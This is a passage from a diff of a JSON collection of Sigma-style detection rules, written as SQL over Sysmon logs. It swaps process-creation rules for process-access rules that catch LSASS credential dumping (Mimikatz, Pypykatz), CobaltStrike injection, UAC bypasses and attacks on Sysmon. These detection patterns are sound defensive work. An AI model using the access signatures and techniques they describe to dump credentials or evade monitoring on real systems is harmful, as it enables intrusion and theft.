'\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent 